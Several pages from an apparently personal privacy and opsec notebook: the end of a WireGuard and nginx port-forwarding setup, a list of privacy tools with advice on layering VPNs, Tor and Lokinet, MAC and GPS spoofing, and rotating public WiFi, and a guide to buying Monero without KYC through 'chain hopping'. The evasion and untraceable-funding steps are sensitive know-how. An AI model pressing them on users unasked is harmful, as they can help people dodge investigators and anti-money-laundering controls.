-j DNAT --to-destination 10.200.200.2:3000 sudo iptables -t nat -A POSTROUTING -j MASQUERADE Copy PostUp = iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j DNAT --to-destination 10.200.200.2:3000 PostUp = iptables -t nat -A POSTROUTING -j MASQUERADE PostDown = iptables -t nat -D PREROUTING -i eth0 -p tcp --dport 443 -j DNAT --to-destination 10.200.200.2:3000 PostDown = iptables -t nat -D POSTROUTING -j MASQUERADE Copy server { listen 80; server_name git.yourdomain.com; return 301 https://$host$request_uri; } server { listen 443 ssl; server_name git.yourdomain.com; ssl_certificate /etc/letsencrypt/live/git.yourdomain.com/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/git.yourdomain.com/privkey.pem; location / { proxy_pass http://10.200.200.2:3000/; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_http_version 1.1; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; } } Copy sudo ln -s /etc/nginx/sites-available/gitproxy /etc/nginx/sites-enabled/ sudo nginx -t sudo systemctl reload nginx Copy sudo apt install certbot python3-certbot-nginx sudo certbot --nginx -d git.yourdomain.com Copy https://git.yourdomain.com --- # Martian's Stack | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack.md) . [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#operating-systems) Operating Systems ---------------------------------------------------------------------------------------------------------------------- [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fwww.qubes-os.org%2Fapple-touch-icon.png%3Fv%3DbOv986l09r&width=20&dpr=3&quality=100&sign=333bf0e4&sv=2)Qubes OS: A reasonably secure operating systemQubes OS](https://www.qubes-os.org/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fwww.kicksecure.com%2Fapple-touch-icon.png%3Fhsversion-headscript-replacement-by-server%3D1%26hsversion_from_server_replacement_unixtime%3D1782372613&width=20&dpr=3&quality=100&sign=cb31ead3&sv=2)Kicksecure - Secure by Default Operating SystemKicksecure](https://www.kicksecure.com/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fwww.whonix.org%2Fapple-touch-icon.png%3Fhsversion-headscript-replacement-by-server%3D1%26hsversion_from_server_replacement_unixtime%3D1781335813&width=20&dpr=3&quality=100&sign=95061368&sv=2)Whonix - Superior Internet PrivacyWhonix](https://whonix.org/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Ffedoraproject.org%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=ab97e283&sv=2)Fedora Linuxfedoraproject.org](https://fedoraproject.org/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Ftails.net%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=ff4fabdb&sv=2)Tails - Hometails.net](https://tails.net/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fproxmox.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=a38fe6b5&sv=2)Proxmox Server SolutionsProxmox](https://proxmox.com/) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#development) Development ---------------------------------------------------------------------------------------------------------- [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fvscodium.com%2Fimg%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=c9b635e6&sv=2)VSCodium - Open Source Binaries of VSCodevscodium.com](https://vscodium.com/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fvoideditor.com%2Ficon.png%3Ffe8088bdbfb5a2cf&width=20&dpr=3&quality=100&sign=27a79ed3&sv=2)Voidvoideditor.com](https://voideditor.com/) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#connectivity-tools-products) Connectivity Tools/Products ------------------------------------------------------------------------------------------------------------------------------------------ [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fmullvad.net%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=e73b1cd&sv=2)Mullvad VPN - Privacy is for the peopleMullvad VPN](https://mullvad.net/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Ftailscale.com%2Ffavicon.png&width=20&dpr=3&quality=100&sign=80db8c60&sv=2)Tailscale | Secure Connectivity for AI, IoT & Multi-Cloudtailscale.com](https://tailscale.com/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fopenvpn.net%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=2e529278&sv=2)Secure VPN Solutions for Business & Remote Access | OpenVPNOpenVPN](https://openvpn.net/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fwww.wireguard.com%2Fimg%2Ficons%2Ffavicon-512.png&width=20&dpr=3&quality=100&sign=3dcf3a6f&sv=2)WireGuard: fast, modern, secure VPN tunnelwww.wireguard.com](https://www.wireguard.com/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fopnsense.org%2Fwp-content%2Fthemes%2Ftemplate%2Fassets%2Fimages%2Ffavicon%2Fandroid-icon-192x192.png&width=20&dpr=3&quality=100&sign=9390ec70&sv=2)OPNsense® is an open source, feature rich firewall and routing platform, offering cutting-edge network protection. - OPNsenseOPNsense](https://opnsense.org/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Flokinet.org%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=839cf5e1&sv=2)Lokinet | Anonymous internet accessLokinet](https://lokinet.org/) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#browsing) Browsing ---------------------------------------------------------------------------------------------------- [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fmullvad.net%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=e73b1cd&sv=2)Mullvad Browser for LinuxMullvad VPN](https://mullvad.net/en/download/browser/linux) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Flibrewolf.net%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=8b8177e2&sv=2)LibreWolf Browserlibrewolf.net](https://librewolf.net/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgithub.com%2Ffluidicon.png&width=20&dpr=3&quality=100&sign=a90b8e92&sv=2)GitHub - linkwarden/linkwarden: ⚡️⚡️⚡️ Self-hosted collaborative bookmark manager to collect, read, annotate, and fully preserve what matters, all in one place.GitHub](https://github.com/linkwarden/linkwarden) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#storage-solutions) Storage Solutions ---------------------------------------------------------------------------------------------------------------------- [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fcryptomator.org%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=d7d3cbed&sv=2)Cryptomator - Free & Open-Source Cloud Storage EncryptionCryptomator](https://cryptomator.org/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fveracrypt.io%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=74e08f2b&sv=2)VeraCrypt - Free Open source disk encryption with strong security for the Paranoidveracrypt.io](https://veracrypt.io/en/Downloads.html) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fmega.nz%2Ffavicon.ico%3Fv%3D3&width=20&dpr=3&quality=100&sign=f132a4&sv=2)MEGAmega.nz](https://mega.nz/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Finternxt.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=c8a13ce6&sv=2)Internxt — Best Encrypted cloud storage & moreinternxt.com](https://internxt.com/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fproton.me%2Ffavicons%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=370deb55&sv=2)Download Proton Drive for Windows, Android, macOS or iOS | ProtonProton](https://proton.me/drive/download) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#self-hosted-business-solutions) Self-Hosted Business Solutions ------------------------------------------------------------------------------------------------------------------------------------------------ [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fcdn.prod.website-files.com%2F64f9d9b4e737e7b37d4e39a4%2F64fe41a59732cbbaa5762828_Webclip.png&width=20&dpr=3&quality=100&sign=7be7a287&sv=2)Ubicloud - Open source alternative to AWSwww.ubicloud.com](https://www.ubicloud.com/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fnextcloud.com%2Fc%2Fuploads%2F2022%2F03%2Ffavicon.png&width=20&dpr=3&quality=100&sign=6c7de3e0&sv=2)Nextcloud - Open source content collaboration platformNextcloud](https://nextcloud.com/) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#messaging) Messaging ------------------------------------------------------------------------------------------------------ ClearNet [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fgetsession.org%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=e05019d1&sv=2)Session | Send Messages, Not Metadata. | Private MessengerSession](https://getsession.org/) DarkNet [https://tox.chat/tox.chat](https://tox.chat/) [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#documentation) Documentation -------------------------------------------------------------------------------------------------------------- [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fstatic-site.onlyoffice.com%2Fpublic%2Fimages%2Ffavicons%2Ffavicon325.png&width=20&dpr=3&quality=100&sign=e4d6b023&sv=2)Online Office Applications for businesswww.onlyoffice.com](https://www.onlyoffice.com/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fwww.libreoffice.org%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=feadd8a6&sv=2)LibreOfficewww.libreoffice.org](https://www.libreoffice.org/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fwww.giuspen.net%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=b17a609e&sv=2)CherryTreegiuspen](https://www.giuspen.net/cherrytree/) * * * [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#privacy-and-security-setup-guide) Mobile Device Privacy and Security ------------------------------------------------------------------------------------------------------------------------------------------------------ #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#devices-and-roles) Devices and Roles **Device #1 with profile switching and data sandbox separation** * **Private Profile:** * [Proton Mail](https://proton.me/mail) , [Proton Drive](https://proton.me/drive) * [Tutanota](https://tutanota.com/) (Secure Email & Calendar) * [Bitwarden](https://bitwarden.com/) or other [password manager](https://www.privacyguides.org/software/passwords/) * [Signal](https://signal.org/) and [Session](https://getsession.org/) (messengers, private 1:1 conversations) * **Travel Profile:** * All run via isolated, sandboxed [Google Mobile Services](https://grapheneos.org/usage#sandboxed-google-play) * **Messengers Profile:** * [WhatsApp](https://www.whatsapp.com/) (only when required) * [Telegram](https://telegram.org/) (for programming chats/news) * No social media apps (minimizes attack surface) **Device #2 for Banking** * SIM/eSIM → Only for banks and SMS 2FA * No social media or travel apps ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#maps) Maps * [OsmAnd](https://osmand.net/) for daily, privacy-first navigation * Waze only on travel, isolated in a separate profile ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#multiple-sims) Multiple SIMs * #1 → Banks via eSIM * #2 → Services * #3 → Calls (personal/general) ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#core-principles) Core Principles * **Compartmentalization:** Strict separation by profile and device * **Minimal Apps:** Only install essentials on each device * **Encryption** * **VPN** * **2FA & YubiKey** * * * [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#os-hygiene) OS Hygiene -------------------------------------------------------------------------------------------------------- * Use an operating system that supports SElinux and enable SElinux in enforcing mode for robust process isolation and mandatory access controls. * Choose hardened Linux distros or privacy-centric operating systems such as Qubes OS, adding SElinux plus strong host firewalls. * Use a VPN killswitch: configure via your VPN client, or manually set firewall rules (e.g., iptables or UFW) to block all traffic unless the VPN is connected. This prevents IP/DNS leaks if the VPN drops. * Always use multi-hop VPNs, configured so each hop is independent and ideally in separate VMs. * Ensure you connect to multi-hop VPNs before Tor; this prevents your ISP or local network from identifying Tor traffic as originating from the home connection, breaking correlation attempts. ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#tor) Tor * Set up a virtual machine (VM) or secondary device for layered routing. * Launch the Tor Browser or configure your system or VM to route all network traffic through Tor. * For advanced control, consider Transparent Tor Proxy setups or bridges, using firewall/iptables rules to redirect all traffic through Tor. * Optionally, use "obfs4" Tor bridges to help bypass censorship. ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#lokinet-with-lockdown-mode) Lokinet (with Lockdown Mode) * On your VM or secondary device, install Lokinet and configure DNS to `127.3.2.1` so all supported traffic is routed through Lokinet. * Use the Lokinet client’s interface to add exit node details to access the clearnet through Lokinet if desired. * Enable lockdown or kill switch mode in your operating system or setup firewall rules to block all non-Lokinet connections. This ensures that if Lokinet disconnects, no unprotected traffic leaks, maintaining privacy. * Use anonymous payments, keep software up to date, and regularly verify lockdown enforcement to prevent data leaks. ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#potential-benefits-of-using-vpns-with-tor-or-lokinet) Potential Benefits of Using VPNs with Tor or Lokinet * VPNs can conceal the use of Tor or Lokinet from your internet provider by encrypting traffic before it leaves your device, enhancing privacy. * They add an additional layer of IP address masking, reducing the risk of linking your real location with your Tor or Lokinet activity. * VPNs can help bypass network restrictions or censorship that might block direct connections to Tor or Lokinet networks. * When used after Tor or Lokinet (though less common), VPNs can help protect against untrusted exit nodes by encrypting traffic leaving the privacy network. * Combining VPNs with Tor or Lokinet can increase security and anonymity over these networks, though at the cost of the VPN provider seeing the traffic as well as added complexity and some performance trade-offs. #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#implication-for-multi-hop-vpn--tor-vs.-multi-hop-vpn--lokinet) Implication for Multi-Hop VPN + Tor vs. Multi-Hop VPN + Lokinet * With **Tor**, the typical setup involves layering VPNs first, then manually directing application traffic (like the Tor Browser) through Tor. This does not create a full device-level tunnel like a VPN. It requires special configuration and iptables rules for transparent proxying if a device-wide Tor network tunnel is desired, and even then, only TCP traffic is routed. * With **Lokinet**, since it operates at the network layer, connecting a device or VM to Lokinet acts much like connecting through a VPN. All traffic (TCP, UDP, ICMP) can be onion-routed automatically. Multi-hop VPN + Lokinet setups allow seamless layered routing at the network level, unlike Tor. ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#summary-table) Summary Table Feature Tor Lokinet OSI Layer Application Layer (Layer 7) Network Layer (Layer 3) Traffic Types TCP only TCP, UDP, ICMP, all IP traffic Network Tunnel Application-specific (e.g., Tor Browser) Full device/VM network tunnel VPN Replacement No, complements VPNs Yes, can replace VPN-like routing Transparency Needs explicit app configs or complex iptables setups Transparent to all apps and traffic Thus, Tor does not natively work "over" VPN like Lokinet can; instead, Tor runs atop VPNs for layered privacy while Lokinet can function directly as a network-layer privacy tool replacing or complementing VPNs. This fundamental architectural difference explains why setups involving multi-hop VPN + Tor require application-level routing and firewall rules, while multi-hop VPN + Lokinet can use simpler, full-network layered tunneling. ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#anonymous-payments-for-no-log-vpns) Anonymous Payments for No-Log VPNs * Select a VPN that explicitly states a no-logs policy and accepts anonymous payments (Monero, CoinJoin BTC, gift/prepaid cards). * Open a new anonymous email (ProtonMail, Tutanota, etc.) using Tor for registration. * Register for the VPN service using only your anonymous details. * Pay with cryptocurrency sent from a wallet with no connection to your identity (consider tumbling or privacy wallets). * Never reuse credentials or email addresses across compartments. ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#hardware-and-id-obfuscation) Hardware & ID Obfuscation * Before connecting to any network, spoof your MAC address ( `macchanger -r eth0` on Linux) for every new session. * Use removable, unlinked network adapters, preferably new or secondhand with no purchase records. * Avoid initializing persistent hardware/user IDs: wipe system fingerprints or use privacy-focused OS features to prevent hardware-based tracking. ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#location-deception) Location Deception * Use GPS spoofing apps/tools on any device with location features. * When possible, operate exclusively via public and random WiFi (libraries, cafes), never returning to the same network. * Do not log in or access any accounts connected to your real identity while on these networks. * Change operational base regularly; never stay at the same public WiFi location or city for repeat sessions. ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#virtual-compartmentalization) Virtual Compartmentalization * Install Qubes OS on your main device, or use a secure Linux host with VirtualBox/Virt-Manager. * Create separate Whonix VMs for each operational activity (web, email, comms, research). * Enable full-disk encryption (LUKS, VeraCrypt, or similar) with plausible deniability features. * Regularly back up data to encrypted external drives. * For highly sensitive operations, use self-destructing VM environments or disposable VMs for one-time use. [PreviousPrivacy and Opsec Resources](https://martian1337.gitbook.io/notes/digital-privacy/opsec) [NextDe-Googling Android](https://martian1337.gitbook.io/notes/digital-privacy/opsec/de-googling-android) Last updated 1 month ago * [Operating Systems](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#operating-systems) * [Development](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#development) * [Connectivity Tools/Products](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#connectivity-tools-products) * [Browsing](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#browsing) * [Storage Solutions](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#storage-solutions) * [Self-Hosted Business Solutions](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#self-hosted-business-solutions) * [Messaging](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#messaging) * [Documentation](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#documentation) * [Mobile Device Privacy and Security](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#privacy-and-security-setup-guide) * [Maps](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#maps) * [Multiple SIMs](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#multiple-sims) * [Core Principles](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#core-principles) * [OS Hygiene](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#os-hygiene) * [Tor](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#tor) * [Lokinet (with Lockdown Mode)](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#lokinet-with-lockdown-mode) * [Potential Benefits of Using VPNs with Tor or Lokinet](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#potential-benefits-of-using-vpns-with-tor-or-lokinet) * [Summary Table](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#summary-table) * [Anonymous Payments for No-Log VPNs](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#anonymous-payments-for-no-log-vpns) * [Hardware & ID Obfuscation](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#hardware-and-id-obfuscation) * [Location Deception](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#location-deception) * [Virtual Compartmentalization](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack#virtual-compartmentalization) --- # Acquiring Monero (XMR) Anonymously | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously.md) . **Objective:** Acquire Monero (XMR) without linking your real-world identity to your wallet holdings. **Core Principle:** Monero is private by default. The primary point of failure is the "on-ramp" the moment you convert Fiat (USD, EUR, etc.) into Crypto. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#disclaimers) Disclaimers * **Legal Compliance:** This guide is for educational purposes. Laws regarding cryptocurrency privacy, tax reporting, and anti-money laundering (AML) vary by jurisdiction. You are responsible for complying with local laws. * **Scam Awareness:** P2P markets and non-KYC services are prime targets for scammers. **Never** communicate outside the platform's escrow system. * **Tax Obligations:** Privacy does not exempt you from tax laws. Capital gains must still be reported in most countries. * * * [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#phase-1-preparation-do-this-first) Phase 1: Preparation (Do This First) --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Before buying anything, set up your secure environment. #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#id-1.-choose-your-wallet) 1\. Choose Your Wallet Do not use an exchange wallet. You need a self-custody wallet where you control the keys. * **Desktop (Best Security):** [Monero GUI Wallet](https://www.getmonero.org/downloads/) (Official) or [Feather Wallet](https://featherwallet.org/) (Lightweight, privacy-focused). * **Mobile:** [Cake Wallet](https://cakewallet.com/) or [Monerujo](https://www.monerujo.io/) . * **Action:** Generate your wallet, write down your **Seed Phrase** on paper (never digital), and store it securely. #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#id-2.-enhance-network-privacy) 2\. Enhance Network Privacy Your IP address can link your activity to your physical location. * **Option A (Best):** Use the **Tor Browser** to access P2P markets and swap services. * **Option B:** Use a reputable, no-log **VPN** (e.g., Mullvad, Proton VPN). * **Note:** Some services (like Bisq) require Tor to function correctly. * * * [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#phase-2-choose-your-acquisition-method) Phase 2: Choose Your Acquisition Method ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Select the method that best balances your need for privacy, speed, and cost. ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#method-a-peer-to-peer-p2p-markets-highest-privacy) Method A: Peer-to-Peer (P2P) Markets (Highest Privacy) _Best for: Maximum anonymity, no ID required._ **How it works:** You trade directly with another human. Funds are held in a secure, non-custodial escrow until the trade is complete. Platform [**HodlHodl**](https://hodlhodl.com/) Description Non-custodial, multisig escrow. No funds ever touch their servers. Payment Methods Bank Transfer, Cash Deposit, Gift Cards, PayPal, Wise. Pros No KYC, global reach, user-friendly interface. Cons Slightly higher fees, liquidity varies by region. Platform [**Bisq**](https://bisq.network/) Description Fully decentralized desktop application. Runs on the Tor network. Payment Methods Bank Transfer, Cash, Revolut, SEPA, Zelle, and 50+ others. Pros Completely decentralized, no central server to hack or censor. Cons Steep learning curve, requires a small BTC security deposit. Platform [**RoboSats**](https://robosats.com/) Description Lightning Network based, runs entirely in the Tor browser. Payment Methods Lightning Network (BTC) only. Pros Extremely fast, high privacy, low fees, ephemeral identities. Cons Requires you to already have Bitcoin (Lightning) to start. **Detailed Steps for P2P Trading:** 1. **Access the Platform:** * For **HodlHodl**: Visit the site directly (HTTPS). * For **Bisq**: Download the desktop app from the official site and install it. * For **RoboSats**: Open the link in the **Tor Browser** (highly recommended). 2. **Create an Account/Offer:** * Register with an email only (no ID). * Either create a "Sell XMR" offer or browse existing "Buy XMR" offers. 3. **Initiate Trade:** * Agree on the price and payment method. * The platform generates a unique **Multisig Escrow Address**. 4. **Deposit Fiat:** * Send your currency (USD, EUR, etc.) to the seller via the agreed method (e.g., bank transfer). * Upload proof of payment to the platform. 5. **Release XMR:** * Once the seller confirms receipt, they release the XMR from the escrow to your wallet. * **Crucial:** Wait until the transaction is confirmed in your wallet before marking the trade as complete. * **HodlHodl:** Uses a non-custodial model, meaning they cannot freeze your funds even if they wanted to. * **Bisq:** Because it is a desktop app running on Tor, your IP address is hidden, and there is no central website to block. * **RoboSats:** Designed specifically for privacy; it creates a temporary "avatar" for each trade so no history is linked to your identity. _Tip: Always verify you are on the correct URL. Scammers often create look-alike domains (e.g.,_ `_hodlhodl.net_` _instead of_ `_.com_`_). Bookmark the official sites._ ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#method-b-non-kyc-swap-services-medium-privacy) Method B: Non-KYC Swap Services (Medium Privacy) _Best for: Speed and ease of use. Good if you already own other crypto._ **How it works:** You send Bitcoin (BTC) or Litecoin (LTC) to a temporary address; the service instantly swaps it to XMR and sends it to your wallet. Service Type Limits Pros Cons **ChangeNOW** Instant Swap No account needed for small amounts. Fast, supports many pairs. May require KYC for large amounts. **FixedFloat** Instant Swap No account needed. Very fast, low fees. IP logging possible. **SimpleSwap** Instant Swap No account needed. User-friendly interface. Variable liquidity. **Steps:** 1. Go to the swap site (preferably via Tor/VPN). 2. Select "Send: BTC" -> "Receive: XMR". 3. Enter your **Monero Wallet Address**. 4. Send the exact amount of BTC requested. 5. Receive XMR automatically (usually 5-20 mins). #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#method-c-bitcoin-atms-variable-privacy) Method C: Bitcoin ATMs (Variable Privacy) _Best for: Cash users in specific locations._ **Steps:** 1. Locate an ATM that supports **Bitcoin** (most do not support XMR directly). 2. Insert cash (small amounts often require no ID). 3. Receive BTC in your wallet. 4. Immediately use **Method B** (Swap Service) to convert BTC → XMR. * * * [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#phase-3-the-chain-hopping-strategy-critical) Phase 3: The "Chain Hopping" Strategy (Critical) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- If you buy crypto on a regulated exchange (Coinbase, Binance, Kraken), **do not send it directly to your Monero wallet.** The exchange knows your identity and that you bought crypto. **The Clean Path:** 1. **Buy BTC** on a KYC Exchange (Coinbase, etc.). 2. **Withdraw BTC** to a fresh, non-KYC wallet (or directly to the swap service). 3. **Swap** BTC → XMR using a non-KYC service (FixedFloat, ChangeNOW). 4. **Withdraw** XMR to your private Monero wallet. _Result:_ The link between your identity (KYC exchange) and your Monero holdings is broken. * * * [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#phase-4-security-checklist) Phase 4: Security Checklist ----------------------------------------------------------------------------------------------------------------------------------------------------------- Once you have your XMR, ensure it stays private. * **Never reuse addresses:** Most Monero wallets generate a new address for every transaction automatically. * **Avoid "Mixing" services:** Monero's privacy is built-in. Using external mixers can sometimes flag your coins as suspicious. * **Check your balance locally:** Use a "Remote Node" (like a local node or a trusted remote node) to verify your balance without leaking your view key to a third party. * **Physical Security:** Keep your seed phrase offline. If someone steals your seed phrase, they steal your funds. * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#summary-of-costs-and-trade-offs) Summary of Costs & Trade-offs Method Privacy Level Cost (Premium) Speed Difficulty **P2P (HodlHodl/Bisq)** 🔴 **Very High** Medium (5-10% premium) Slow (Hours/Days) Medium **Non-KYC Swaps** 🟡 **Medium** Low (1-3% fee) Fast (Minutes) Easy **ATM + Swap** 🟡 **Medium** High (10-15% fees) Fast Medium **Regulated Exchange** 🔵 **None** Low Fast Easy **Final Recommendation:** For the highest privacy, use **Bisq** or **HodlHodl**. For the best balance of speed and privacy, use **FixedFloat** or **ChangeNOW** after acquiring Bitcoin via a cash ATM or P2P. _Remember: Your privacy is only as strong as your weakest link. If you reveal your identity during the fiat-to-crypto step, the rest of the chain is compromised._ [PreviousDe-Googling Android](https://martian1337.gitbook.io/notes/digital-privacy/opsec/de-googling-android) [NextSelf-Hosting](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting) Last updated 1 month ago * [Disclaimers](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#disclaimers) * [Phase 1: Preparation (Do This First)](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#phase-1-preparation-do-this-first) * [Phase 2: Choose Your Acquisition Method](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#phase-2-choose-your-acquisition-method) * [Method A: Peer-to-Peer (P2P) Markets (Highest Privacy)](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#method-a-peer-to-peer-p2p-markets-highest-privacy) * [Method B: Non-KYC Swap Services (Medium Privacy)](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#method-b-non-kyc-swap-services-medium-privacy) * [Phase 3: The "Chain Hopping" Strategy (Critical)](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#phase-3-the-chain-hopping-strategy-critical) * [Phase 4: Security Checklist](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#phase-4-security-checklist) * [Summary of Costs & Trade-offs](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously#summary-of-costs-and-trade-offs) --- # Secure Remote Access with TailScale + Hardened SSH | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/self-hosting/secure-remote-access-with-tailscale-+-hardened-ssh.md) . ### 